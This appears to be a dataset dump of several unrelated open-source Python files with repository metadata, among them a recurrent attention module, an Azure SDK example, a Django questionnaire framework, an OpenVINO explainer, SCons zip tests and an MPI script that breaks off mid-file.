] | 4 | 2020-09-28T01:47:19.000Z | 2021-02-24T17:01:25.000Z | fast_transformers/recurrent/attention/full_attention.py | jmercat/fast-transformers | 1061f2ffa09c6d74aa252389e47f76ae827b1064 | [
"MIT"
] | null | null | null | fast_transformers/recurrent/attention/full_attention.py | jmercat/fast-transformers | 1061f2ffa09c6d74aa252389e47f76ae827b1064 | [
"MIT"
] | 1 | 2021-06-22T01:37:58.000Z | 2021-06-22T01:37:58.000Z | #
# Copyright (c) 2020 Idiap Research Institute, http://www.idiap.ch/
# Written by Angelos Katharopoulos <angelos.katharopoulos@idiap.ch>,
# Apoorv Vyas <avyas@idiap.ch>
#
"""Implement the typical softmax attention as a recurrent module to speed up
autoregressive inference. See fast_transformers.attention.full_attention ."""
from math import sqrt
import torch
from torch.nn import Dropout, Module
class RecurrentFullAttention(Module):
"""Implement the full softmax attention as a recurrent module.
Arguments
---------
softmax_temp: The temperature to use for the softmax attention.
(default: 1/sqrt(d_keys) where d_keys is computed at
runtime)
dropout_rate: The dropout rate to apply to the attention (default: 0.1)
"""
def __init__(self, softmax_temp=None, dropout_rate=0.1):
super(RecurrentFullAttention, self).__init__()
self.softmax_temp = softmax_temp
self.dropout = Dropout(dropout_rate)
def forward(self, query, key, value, memory=None):
# Extract some shapes and compute the temperature
N, H, E = query.shape
_, _, D = value.shape
softmax_temp = self.softmax_temp or 1./sqrt(E)
# Aggregate the list of keys and values
if memory is not None:
keys, values = memory
keys = torch.cat([keys, key[:, :, None]], dim=2)
values = torch.cat([values, value[:, :, None]], dim=2)
else:
keys = key[:, :, None]
values = value[:, :, None]
# Compute the unnormalized attention
QK = torch.einsum("nhe,nhse->nhs", query, keys)
# Compute the attention and the weighted average
A = self.dropout(torch.softmax(softmax_temp * QK, dim=-1))
V = torch.einsum("nhs,nhsd->nhd", A, values).contiguous()
# Make sure that what we return is contiguous
return V, [keys, values]
| 35.381818 | 79 | 0.635663 | 247 | 1,946 | 4.910931 | 0.437247 | 0.063479 | 0.037098 | 0.031327 | 0.056059 | 0.056059 | 0 | 0 | 0 | 0 | 0 | 0.009028 | 0.260021 | 1,946 | 54 | 80 | 36.037037 | 0.833333 | 0.434738 | 0 | 0 | 0 | 0 | 0.024738 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.086957 | false | 0 | 0.130435 | 0 | 0.304348 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
10cdef881dc36185566ac1966c055227805cc631 | 2,797 | py | Python | examples/example_compute_availabilitysets.py | zikalino/AzurePythonExamples | 23f9c173f0736f4e7ff66dde0402ef88da4ccc8f | [
"MIT"
] | 1 | 2020-09-04T14:38:13.000Z | 2020-09-04T14:38:13.000Z | examples/example_compute_availabilitysets.py | zikalino/AzurePythonExamples | 23f9c173f0736f4e7ff66dde0402ef88da4ccc8f | [
"MIT"
] | null | null | null | examples/example_compute_availabilitysets.py | zikalino/AzurePythonExamples | 23f9c173f0736f4e7ff66dde0402ef88da4ccc8f | [
"MIT"
] | null | null | null | #-------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#--------------------------------------------------------------------------
import os
from azure.mgmt.compute import ComputeManagementClient
from azure.mgmt.resource import ResourceManagementClient
from azure.common.credentials import ServicePrincipalCredentials
#--------------------------------------------------------------------------
# credentials from environment
#--------------------------------------------------------------------------
SUBSCRIPTION_ID = os.environ['AZURE_SUBSCRIPTION_ID']
TENANT_ID = os.environ['AZURE_TENANT']
CLIENT_ID = os.environ['AZURE_CLIENT_ID']
CLIENT_SECRET = os.environ['AZURE_SECRET']
#--------------------------------------------------------------------------
# variables
#--------------------------------------------------------------------------
AZURE_LOCATION = 'eastus'
RESOURCE_GROUP = "myResourceGroup"
AVAILABILITY_SET_NAME = "myAvailabilitySet"
#--------------------------------------------------------------------------
# management clients
#--------------------------------------------------------------------------
credentials = ServicePrincipalCredentials(
client_id=CLIENT_ID,
secret=CLIENT_SECRET,
tenant=TENANT_ID
)
mgmt_client = ComputeManagementClient(credentials, SUBSCRIPTION_ID)
resource_client = ResourceManagementClient(credentials, SUBSCRIPTION_ID)
#--------------------------------------------------------------------------
# resource group (prerequisite)
#--------------------------------------------------------------------------
print("Creating Resource Group")
resource_client.resource_groups.create_or_update(resource_group_name=RESOURCE_GROUP, parameters={ 'location': AZURE_LOCATION })
#--------------------------------------------------------------------------
# /AvailabilitySets/put/Create an availability set.[put]
#--------------------------------------------------------------------------
print("Create an availability set.")
BODY = {
"location": AZURE_LOCATION,
"platform_fault_domain_count": "2",
"platform_update_domain_count": "20"
}
result = mgmt_client.availability_sets.create_or_update(resource_group_name=RESOURCE_GROUP, availability_set_name=AVAILABILITY_SET_NAME, parameters=BODY)
#--------------------------------------------------------------------------
# /AvailabilitySets/get/List availability sets in a subscription.[get]
#--------------------------------------------------------------------------
print("List availability sets in a subscription.")
result = mgmt_client.availability_sets.list_by_subscription(expand="virtualMachines\$ref")
| 42.378788 | 153 | 0.507329 | 205 | 2,797 | 6.668293 | 0.370732 | 0.066569 | 0.040966 | 0.035113 | 0.162399 | 0.115582 | 0.064375 | 0.064375 | 0 | 0 | 0 | 0.001146 | 0.064355 | 2,797 | 65 | 154 | 43.030769 | 0.521207 | 0.499821 | 0 | 0 | 0 | 0 | 0.205669 | 0.055233 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.137931 | 0 | 0.137931 | 0.103448 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
10d3f9c66b9b6f1acf358bee09f3b9bcb84cc122 | 1,856 | py | Python | api.py | vladloh/acm-cli | 136ca85cffe16c350977d5bf14e5b7a86962c477 | [
"MIT"
] | null | null | null | api.py | vladloh/acm-cli | 136ca85cffe16c350977d5bf14e5b7a86962c477 | [
"MIT"
] | null | null | null | api.py | vladloh/acm-cli | 136ca85cffe16c350977d5bf14e5b7a86962c477 | [
"MIT"
] | null | null | null | import argparse
from prettytable import PrettyTable
from prettytable import from_html_one
from worker import Worker
from config import login, password, folder_path
def initialize_parser():
"""Initialize parser for CLI."""
parser = argparse.ArgumentParser(
usage='acm [command] [parameters]',
)
parser.set_defaults(func=lambda args: parser.print_help())
subparsers = parser.add_subparsers(
dest='command',
title='Commands',
metavar='<command>',
)
gen_cmd = subparsers.add_parser('gen', help='Generate new contests')
gen_cmd.set_defaults(func=generate)
submit_cmd = subparsers.add_parser('submit', help='Submit task')
submit_cmd.add_argument('path', type=str, help='File to submit')
submit_cmd.set_defaults(func=submit)
status_cmd = subparsers.add_parser('status', help='Get status of all problems in contest')
status_cmd.set_defaults(func=status)
submissions_cmd = subparsers.add_parser('submissions', help='Get status of all problems in contest')
submissions_cmd.set_defaults(func=submissions)
return parser
def get_worker():
return Worker(login, password, folder_path)
def generate(args):
w = get_worker()
res = w.update_contests()
print(res)
def submit(args):
w = get_worker()
res = w.submit_task(args.path)
print(res)
def status(args):
w = get_worker()
res = w.get_summary()
x = PrettyTable()
x.field_names = ["Problem", "Verdict"]
for i in res:
x.add_row([i, res[i]])
print(x)
def submissions(args):
w = get_worker()
table = w.get_last_submission()
x = from_html_one(table)
print(x[1:10])
def main():
"""Point of entry."""
parser = initialize_parser()
args = parser.parse_args()
args.func(args)
if __name__ == '__main__':
main()
| 23.2 | 104 | 0.671336 | 243 | 1,856 | 4.921811 | 0.320988 | 0.020067 | 0.062709 | 0.073579 | 0.147157 | 0.103679 | 0.058528 | 0.058528 | 0 | 0 | 0 | 0.002037 | 0.206358 | 1,856 | 79 | 105 | 23.493671 | 0.809912 | 0.022629 | 0 | 0.111111 | 0 | 0 | 0.123128 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.12963 | false | 0.037037 | 0.092593 | 0.018519 | 0.259259 | 0.092593 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
10d929632dae7a58fe9ad2a5c602cd815300085f | 2,160 | py | Python | tests/test_linked_tmp_dir.py | jessekrubin/pup | 2cab5da7b1b39453c44be556b691db83442b0565 | [
"BSD-2-Clause"
] | 2 | 2019-03-07T09:26:36.000Z | 2019-07-31T17:24:23.000Z | tests/test_linked_tmp_dir.py | jessekrubin/pup | 2cab5da7b1b39453c44be556b691db83442b0565 | [
"BSD-2-Clause"
] | 2 | 2019-10-26T02:29:54.000Z | 2021-06-25T15:28:12.000Z | tests/test_linked_tmp_dir.py | jessekrubin/pup | 2cab5da7b1b39453c44be556b691db83442b0565 | [
"BSD-2-Clause"
] | 1 | 2019-07-31T17:24:32.000Z | 2019-07-31T17:24:32.000Z | # -*- coding: utf-8 -*-
import os
from os import chdir
from os import path
from os import sep
import pupy.utils
from pupy import dirs_gen
from pupy import files_gen
PWD = path.split(path.realpath(__file__))[0]
def test_mkdirs():
dirs = [("something",), ("something", "else")]
expected = [path.join(*route) for route in dirs]
with pupy.utils.linked_tmp_dir(dir=PWD, mkdirs=dirs) as tmpdir:
dirs = sorted(
dirpath
for dirpath in (
tmp_subdir.replace(tmpdir, "").strip(sep)
for tmp_subdir in dirs_gen(tmpdir)
)
if dirpath != ""
)
assert set(dirs) == set(expected)
assert all(not path.exists(d) for d in dirs)
def test_linkin():
tdata = [
["dummy_dir", "a_file.txt"],
["dummy_dir", "b_file.txt"],
["dummy_dir", "a_dir", "c_file.txt"],
["dummy_dir", "a_dir", "a_a_dir", "d_file.txt"],
["dummy_dir", "b_dir", "e_file.txt"],
["dummy_dir", "b_dir", "f_file.txt"],
]
chdir(PWD)
lnfiles = [(path.join(*route), path.join(PWD, *route)) for route in tdata]
print(lnfiles)
dirs = [path.join(PWD, *route[:-1]) for route in tdata]
for thingy in set(dirs):
os.makedirs(thingy, exist_ok=True)
print(dirs)
# for uno, dos in lnfiles:
# touch(uno)
tmp_dirpath = None
with pupy.utils.linked_tmp_dir(lnfiles=lnfiles) as tmpdir:
tmp_dirpath = tmpdir
linkedfiles = sorted(
dirpath
for dirpath in (
tmp_subdir.replace(tmpdir, "").strip(sep)
for tmp_subdir in files_gen(tmpdir)
)
if dirpath != ""
)
# print(list(files_gen(tmpdir)))
# print(tmpdir)
# print(os.listdir(tmpdir))
lnfiles_links = [link for link, target in lnfiles]
assert set(lnfiles_links) == set(linkedfiles)
assert not path.exists(tmp_dirpath)
for link, target in lnfiles:
assert path.exists(target)
# try:
# rmtree(path.join(PWD, 'dummy_dir'))
# except:
# pass
if __name__ == "__main__":
pass
| 27.341772 | 78 | 0.571296 | 281 | 2,160 | 4.206406 | 0.284698 | 0.047377 | 0.050761 | 0.063452 | 0.284264 | 0.270728 | 0.116751 | 0.116751 | 0.116751 | 0.116751 | 0 | 0.001972 | 0.295833 | 2,160 | 78 | 79 | 27.692308 | 0.775148 | 0.089815 | 0 | 0.142857 | 0 | 0 | 0.087468 | 0 | 0 | 0 | 0 | 0 | 0.089286 | 1 | 0.035714 | false | 0.017857 | 0.125 | 0 | 0.160714 | 0.035714 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
10db58e9449ec9ec50d75caab8c6a1198181a281 | 8,527 | py | Python | questionnaire_core/question_types/base.py | anfema/django-questionnaire-core | 82151cf14d00b5a83cb478cc07f9143fd57382c9 | [
"MIT"
] | null | null | null | questionnaire_core/question_types/base.py | anfema/django-questionnaire-core | 82151cf14d00b5a83cb478cc07f9143fd57382c9 | [
"MIT"
] | 2 | 2019-01-30T16:05:15.000Z | 2021-06-10T14:45:57.000Z | questionnaire_core/question_types/base.py | anfema/django-questionnaire-core | 82151cf14d00b5a83cb478cc07f9143fd57382c9 | [
"MIT"
] | 2 | 2019-01-17T12:09:47.000Z | 2019-01-30T15:59:01.000Z | import inspect
import string
from django import forms
from django.core.exceptions import MultipleObjectsReturned, ObjectDoesNotExist
from django.template.engine import Engine
from django.template.exceptions import TemplateDoesNotExist
class QuestionTypeRegistry:
"""Registry for question type classes."""
_registered_types = {}
@classmethod
def register(cls, question_type):
name = question_type.meta.name
cls._registered_types[name] = question_type
@classmethod
def unregister(cls, question_type):
name = question_type.meta.name
if name in cls._registered_types:
del cls._registered_types[name]
@classmethod
def get_question_types(cls):
return cls._registered_types
@classmethod
def get_question_type(cls, name):
try:
return cls._registered_types[name]
except KeyError:
return
class Options:
"""Class to hold `meta` options of a question type class."""
REQUIRED = ('name', 'verbose_name')
NAME_VALID_CHARS = string.ascii_lowercase + string.digits + '_'
def __init__(self, cls, meta):
for required_option in self.REQUIRED:
if not meta.get(required_option, None):
raise AttributeError('{}.Meta missing required field "{}"'.format(cls.__name__, required_option))
if not set(self.NAME_VALID_CHARS).issuperset(set(meta.get('name'))):
raise ValueError(
'Invalid name for question type class {}: {} (valid chars: {})'.format(
cls.__name__,
meta.get('name'),
self.NAME_VALID_CHARS,
)
)
self.name = meta.get('name')
self.verbose_name = meta.get('verbose_name')
self.multiple = meta.get('multiple', False)
self.widget_class = meta.get('widget_class', None)
self._widget_template_name = meta.get('widget_template_name')
self._widget_option_template_name = meta.get('widget_option_template_name')
@property
def widget_template_name(self):
return self._widget_template_name or self.select_default_template('template_name')
@property
def widget_option_template_name(self):
return self._widget_option_template_name or self.select_default_template('option_template_name')
def select_default_template(self, template_key):
"""Select default template for the formfield widget.
Returns the packaged template for the widget if available.
"""
if template_key == 'template_name':
default_template = 'questionnaire_core/widgets/{name}.html'.format(name=self.name)
elif template_key == 'option_template_name':
default_template = 'questionnaire_core/widgets/{name}_option.html'.format(name=self.name)
else:
return
try:
template_engine = Engine.get_default()
packaged_template = template_engine.get_template(default_template)
return packaged_template.name
except TemplateDoesNotExist:
return
class QuestionTypeMeta(type):
"""Meta class for question type classes.
Responsible for registering question type classes with QuestionTypeRegistry
and setting up the `meta` attribute of question type classes.
"""
def __new__(mcs, name, bases, attrs):
super_new = super(QuestionTypeMeta, mcs).__new__
# register only subclasses of QuestionTypeBase not QuestionTypeBase itself
if name == 'QuestionTypeBase':
return super_new(mcs, name, bases, attrs)
attr_meta = attrs.pop('Meta', None)
# don't register abstract classes
if getattr(attr_meta, 'abstract', False):
return super_new(mcs, name, bases, attrs)
if not attr_meta or not inspect.isclass(attr_meta):
raise AttributeError('{}.Meta attribute missing or not a class'.format(name))
new_class = super_new(mcs, name, bases, attrs)
# create meta attribute (instance of Options) from new_class.Meta (similar to Model._meta)
setattr(new_class, 'meta', Options(new_class, attr_meta.__dict__))
QuestionTypeRegistry.register(new_class)
return new_class
class QuestionTypeBase(object, metaclass=QuestionTypeMeta):
"""Base class for question type classes"""
class OptionsForm(forms.Form):
pass
def __init__(self, question):
self.question = question
def question_option_form(self, *args, **kwargs): # arg0: request (optional)
return self.OptionsForm
@classmethod
def question_option_form_fields(cls):
return cls.OptionsForm.base_fields
def clean_question_options(self, question_options):
"""Clean question options (`Question.question_options`).
Override to implement any custom validations of the question options of the question type.
:param question_options: django admin form field data
:type question_options: dict
:return: cleaned form field data
:rtype: dict
:raises: django.forms.ValidationError: Validation error
"""
return question_options
def clean_answer_data(self, data):
"""Clean answer data (`QuestionAnswer.answer_data`).
:param data: data returned from the formfield
:return: cleaned formfield data
:raises: django.forms.ValidationError: Validation error
"""
return data
def formfield(self, result_set):
"""Form field for the question type.
:param result_set: result set of the current form
:type result_set: questionnaire_core.models.QuestionnaireResult
:return: django form field for the question type
:rtype: django.forms.Field
"""
raise NotImplementedError
def formfield_widget(self, **kwargs):
"""Setup and return the widget for the formfield."""
widget_attrs = self.formfield_widget_attrs()
if 'attrs' in kwargs:
widget_attrs.update(kwargs.get('attrs'))
kwargs['attrs'] = widget_attrs
widget = self.widget_class()(**kwargs)
# set template attribute(s) of the widget
for template_key in ('template_name', 'option_template_name'):
meta_template_key = 'widget_{}'.format(template_key)
if getattr(self.question.question_type_obj.meta, meta_template_key) and hasattr(widget, template_key):
setattr(widget, template_key, getattr(self.question.question_type_obj.meta, meta_template_key))
return widget
def widget_class(self):
"""Return the configured widget class for the formfield."""
if not self.meta.widget_class:
raise ValueError('{}.Meta.widget_class attribute is missing.'.format(self.__class__.__name__))
return self.meta.widget_class
def formfield_widget_attrs(self):
"""Setup and return the attributes for the formfield widget (based on question options)."""
attrs = dict()
if 'autocomplete' in self.question.question_options:
attrs.update({'autocomplete': 'on' if self.question.question_options.get('autocomplete') else 'off'})
return attrs
def initial_field_value(self, result_set):
"""Return the initial formfield value based on the supplied result set."""
if self.question.question_type_obj.meta.multiple:
return list(result_set.answers.filter(question=self.question).values_list('answer_data', flat=True))
else:
try:
answer = result_set.answers.get(question=self.question)
return answer.answer_data
except ObjectDoesNotExist:
return None
except MultipleObjectsReturned:
raise ValueError('Multiple answers found for QuestionType with multiple=False')
def save(self, result_set, answer_data):
from ..models import QuestionAnswer
if self.meta.multiple:
assert isinstance(answer_data, list)
for answer_data_part in answer_data:
QuestionAnswer.objects.create(
result_set=result_set,
question=self.question,
answer_data=answer_data_part,
)
else:
QuestionAnswer.objects.create(
result_set=result_set,
question=self.question,
answer_data=answer_data,
)
| 37.399123 | 114 | 0.659669 | 965 | 8,527 | 5.603109 | 0.180311 | 0.042168 | 0.023303 | 0.017755 | 0.216386 | 0.163492 | 0.131311 | 0.085815 | 0.051045 | 0.051045 | 0 | 0.000158 | 0.255541 | 8,527 | 227 | 115 | 37.563877 | 0.851607 | 0.196083 | 0 | 0.181818 | 0 | 0 | 0.095791 | 0.016594 | 0 | 0 | 0 | 0 | 0.006993 | 1 | 0.13986 | false | 0.006993 | 0.048951 | 0.034965 | 0.391608 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
10dd825e001aa7924f28c1740803cd3a8e44f8f0 | 320 | py | Python | pythonProject/desafio079.py | maisalobao/Python | 8b8fa9796853c8f094cb1602e7e45f57905a9057 | [
"MIT"
] | 1 | 2022-03-26T08:46:36.000Z | 2022-03-26T08:46:36.000Z | pythonProject/desafio079.py | maisalobao/Python | 8b8fa9796853c8f094cb1602e7e45f57905a9057 | [
"MIT"
] | null | null | null | pythonProject/desafio079.py | maisalobao/Python | 8b8fa9796853c8f094cb1602e7e45f57905a9057 | [
"MIT"
] | null | null | null | numeros = list()
while True:
n = (int(input('Digite um valor:')))
if n not in numeros:
numeros.append(n)
else:
print('Valor duplicado!')
escolha = str(input('Deseja continuar? [S/N]')).upper().strip()[0]
if escolha in 'N':
break
numeros.sort()
print(f'Você digitou {numeros}') | 26.666667 | 70 | 0.590625 | 44 | 320 | 4.295455 | 0.681818 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004098 | 0.2375 | 320 | 12 | 71 | 26.666667 | 0.770492 | 0 | 0 | 0 | 0 | 0 | 0.242991 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.166667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
10ddae9de8ee7cd14d8dcf0dcc4990b53daa7cad | 3,228 | py | Python | wb/main/jobs/inference_test_image/test_image_classification_explainer.py | apaniukov/workbench | 2f2653ecfd0143d2d53e33ad84379f13443fdfaa | [
"Apache-2.0"
] | 23 | 2022-03-17T12:24:09.000Z | 2022-03-31T09:13:30.000Z | wb/main/jobs/inference_test_image/test_image_classification_explainer.py | apaniukov/workbench | 2f2653ecfd0143d2d53e33ad84379f13443fdfaa | [
"Apache-2.0"
] | 18 | 2022-03-21T08:17:44.000Z | 2022-03-30T12:42:30.000Z | wb/main/jobs/inference_test_image/test_image_classification_explainer.py | apaniukov/workbench | 2f2653ecfd0143d2d53e33ad84379f13443fdfaa | [
"Apache-2.0"
] | 16 | 2022-03-17T12:24:14.000Z | 2022-03-31T12:15:12.000Z | """
OpenVINO DL Workbench
Test image explainer
Copyright (c) 2021 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import base64
from typing import List, Callable, Tuple
import cv2
import numpy as np
from openvino.pyopenvino import Layout
from openvino.tools.accuracy_checker.evaluators import ModelEvaluator
from openvino.tools.accuracy_checker.representation import ClassificationPrediction
from wb.main.jobs.inference_test_image.accuracy_checker_representations_serializers import InferencePrediction
from wb.main.jobs.inference_test_image.rise import RISE
class TestImageClassificationExplainer:
def __init__(self, model_evaluator: ModelEvaluator):
self.model_evaluator = model_evaluator
first_input = list(model_evaluator.launcher.inputs.values())[0]
input_layout: Layout = first_input.layout
shape = first_input.shape
h_index = input_layout.get_index_by_name('H')
w_index = input_layout.get_index_by_name('W')
self.image_info_inputs = shape[h_index], shape[w_index]
self.rise = RISE(self.image_info_inputs)
def explain(self, image_path: str, progress_cb: Callable[[int], None] = None) -> List[InferencePrediction]:
test_image = cv2.imread(image_path)
result: ClassificationPrediction = self.model_evaluator.process_single_image(test_image)
top_k = min(5, len(result.scores))
top_k_labels = result.top_k(top_k)
explanations = self.rise.explain(lambda x: self.model_evaluator.process_single_image(x).scores,
cv2.resize(test_image, self.image_info_inputs),
progress_cb)
predictions: List[InferencePrediction] = []
for label_id in top_k_labels:
prediction = InferencePrediction()
prediction.category_id = int(label_id)
prediction.score = float(result.scores[label_id])
prediction.explanation_mask = self.to_base64_heat_mask(
explanations[label_id],
(test_image.shape[1], test_image.shape[0])
)
predictions.append(prediction)
return predictions
@classmethod
def to_base64_heat_mask(cls, explanation: np.array, size: Tuple[int, int]) -> str:
explanation_mask = cv2.resize(cls.to_heat_mask(explanation), size)
_, buffer = cv2.imencode('.jpg', explanation_mask)
return base64.b64encode(buffer).decode('utf-8')
@staticmethod
def to_heat_mask(mask: np.array) -> np.array:
heat_mask = cv2.normalize(mask, None, alpha=0, beta=255, norm_type=cv2.NORM_MINMAX).astype(np.uint8)
return cv2.applyColorMap(heat_mask, cv2.COLORMAP_JET)
| 39.851852 | 111 | 0.711586 | 414 | 3,228 | 5.342995 | 0.422705 | 0.03255 | 0.03255 | 0.025769 | 0.117541 | 0.088608 | 0.056058 | 0 | 0 | 0 | 0 | 0.014453 | 0.206939 | 3,228 | 80 | 112 | 40.35 | 0.849609 | 0.187113 | 0 | 0 | 0 | 0 | 0.004224 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.085106 | false | 0 | 0.191489 | 0 | 0.361702 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
10e01d950f12c52f0048a5b825e752558dafbd51 | 2,540 | py | Python | test/ZIP/ZIPROOT.py | jcassagnol-public/scons | 8eaf585a893757e68c9e4a6e25d375021fa5eab7 | [
"MIT"
] | 1,403 | 2017-11-23T14:24:01.000Z | 2022-03-30T20:59:39.000Z | test/ZIP/ZIPROOT.py | jcassagnol-public/scons | 8eaf585a893757e68c9e4a6e25d375021fa5eab7 | [
"MIT"
] | 3,708 | 2017-11-27T13:47:12.000Z | 2022-03-29T17:21:17.000Z | test/ZIP/ZIPROOT.py | jcassagnol-public/scons | 8eaf585a893757e68c9e4a6e25d375021fa5eab7 | [
"MIT"
] | 281 | 2017-12-01T23:48:38.000Z | 2022-03-31T15:25:44.000Z | #!/usr/bin/env python
#
# MIT License
#
# Copyright The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import TestSCons
_python_ = TestSCons._python_
test = TestSCons.TestSCons()
import zipfile
test.subdir('sub1')
test.subdir(['sub1', 'sub2'])
test.write('SConstruct', """
env = Environment(tools = ['zip'])
env.Zip(target = 'aaa.zip', source = ['sub1/file1'], ZIPROOT='sub1')
env.Zip(target = 'bbb.zip', source = ['sub1/file2', 'sub1/sub2/file2'], ZIPROOT='sub1')
""" % locals())
test.write(['sub1', 'file1'], "file1\n")
test.write(['sub1', 'file2'], "file2a\n")
test.write(['sub1', 'sub2', 'file2'], "file2b\n")
test.run(arguments = 'aaa.zip', stderr = None)
test.must_exist('aaa.zip')
# TEST: Zip file should contain 'file1', not 'sub1/file1', because of ZIPROOT.
with zipfile.ZipFile('aaa.zip', 'r') as zf:
test.fail_test(zf.testzip() is not None)
files = test.zipfile_files('aaa.zip')
test.fail_test(test.zipfile_files('aaa.zip') != ['file1'],
message='Zip file aaa.zip has wrong files: %s' % repr(files))
###
test.run(arguments = 'bbb.zip', stderr = None)
test.must_exist('bbb.zip')
# TEST: Zip file should contain 'sub2/file2', not 'sub1/sub2/file2', because of ZIPROOT.
with zipfile.ZipFile('bbb.zip', 'r') as zf:
test.fail_test(zf.testzip() is not None)
files = test.zipfile_files('bbb.zip')
test.fail_test(test.zipfile_files('bbb.zip') != ['file2', 'sub2/file2'],
message='Zip file bbb.zip has wrong files: %s' % repr(files))
test.pass_test()
| 32.987013 | 88 | 0.709843 | 379 | 2,540 | 4.717678 | 0.37467 | 0.049217 | 0.026846 | 0.01566 | 0.241611 | 0.231544 | 0.134228 | 0.099553 | 0.065996 | 0.065996 | 0 | 0.015799 | 0.152756 | 2,540 | 76 | 89 | 33.421053 | 0.815056 | 0.491339 | 0 | 0.068966 | 0 | 0.068966 | 0.342835 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.034483 | 0.068966 | 0 | 0.068966 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
10e0c703082609535db5fb8adcd5ad5028b03e45 | 1,943 | py | Python | tests/macro/scripts/MPI/np_point_to_point_3.py | dina-fouad/pyccel | f4d919e673b400442b9c7b81212b6fbef749c7b7 | [
"MIT"
] | 206 | 2018-06-28T00:28:47.000Z | 2022-03-29T05:17:03.000Z | tests/macro/scripts/MPI/np_point_to_point_3.py | dina-fouad/pyccel | f4d919e673b400442b9c7b81212b6fbef749c7b7 | [
"MIT"
] | 670 | 2018-07-23T11:02:24.000Z | 2022-03-30T07:28:05.000Z | tests/macro/scripts/MPI/np_point_to_point_3.py | dina-fouad/pyccel | f4d919e673b400442b9c7b81212b6fbef749c7b7 | [
"MIT"
] | 19 | 2019-09-19T06:01:00.000Z | 2022-03-29T05:17:06.000Z | # pylint: disable=missing-function-docstring, missing-module-docstring/
from mpi4py import MPI
from numpy import zeros
# we need to declare these variables somehow,
# since we are calling mpi subroutines
if __name__ == '__main__':
size = -1
rank = -1
comm = MPI.COMM_WORLD
rank = comm.Get_rank()
size = comm.Get_size()
nx = 4
ny = 3 * 2
x = zeros(nx)
y = zeros((3,2))
if rank == 0:
x[:] = 1.0
y[:,:] = 1.0
source = 0
dest = 1
# ...
tag1 = 1234
if rank == source:
comm.send(x,dest, tag=tag1)
print("> test 1: processor ", rank, " sent ", x)
if rank == dest:
